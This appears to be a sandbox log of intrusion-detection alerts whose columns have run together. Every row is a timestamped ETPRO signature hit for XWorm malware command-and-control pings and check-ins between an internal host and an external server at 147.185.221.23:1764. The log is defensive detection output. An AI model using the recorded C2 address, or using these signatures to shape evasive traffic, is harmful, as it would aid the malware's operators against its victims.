                                                                                        2024-10-13T19:11:03.651179+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.651179+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.719259+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.719259+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.828599+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.828599+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.934912+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:03.934912+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.036113+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.036113+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.126282+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.126282+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.264224+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:04.467330+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.467330+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.476636+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.629264+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.629264+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.703479+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.703479+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.953915+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:04.953915+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.031913+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.031913+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.109957+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.109957+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.188191+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.188191+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.289096+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.289096+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.382965+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.382965+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.454253+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.454253+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.532039+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.532039+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.625487+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.625487+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.703864+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.703864+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.796472+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.796472+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.877676+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.877676+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.994046+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:05.994046+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.078508+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.078508+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.157324+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.157324+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.251106+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.251106+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.329419+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.329419+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.411540+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.411540+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.486429+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.486429+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.562991+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.562991+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.648579+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.648579+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.728603+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.728603+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.842910+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:06.842910+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.275759+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.275759+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.366278+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.366278+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.464265+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.464265+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.531688+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.531688+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.625417+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.625417+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.703543+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.703543+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.781548+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.781548+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.873080+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.873080+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.954063+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:07.954063+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.041085+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.041085+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.110057+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.110057+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.131437+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:08.134267+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.187919+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.187919+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.266034+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.266034+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.370899+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.370899+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.422216+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.422216+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.500318+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.500318+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.562816+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.562816+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.626756+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.626756+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.703451+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.703451+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.769495+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.769495+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.859764+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.859764+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.923871+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:08.923871+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.000573+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.000573+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.071349+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.071349+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.143780+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.143780+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.220504+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.220504+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.297393+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.297393+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.363791+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.363791+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.422071+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.422071+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.485766+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.485766+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.562867+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.562867+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.667938+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.667938+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.805118+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.805118+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.968605+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:09.968605+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.047808+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.047808+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.125204+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.125204+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.206214+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.206214+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.265945+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.265945+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.328833+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.328833+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.407986+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.407986+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.469278+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.469278+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.547342+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.547342+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.625398+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.625398+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.703428+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.703428+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.765898+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:10.765898+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.038918+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.038918+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.063706+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.063706+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.141619+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.141619+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.245038+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.245038+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.312773+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.312773+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.346520+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:11.352613+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.375610+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.375610+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.437805+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.437805+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.501051+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.501051+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.576846+02002852870ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes1147.185.221.231764192.168.2.550002TCP
                                                                                        2024-10-13T19:11:11.577684+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550002147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.579737+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.579737+02002852923ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes (Client)1192.168.2.550003147.185.221.231764TCP
                                                                                        2024-10-13T19:11:11.640930+02002852873ETPRO MALWARE Win32/XWorm CnC PING Command Outbound M21192.168.2.550003147.185.221.231764TCP
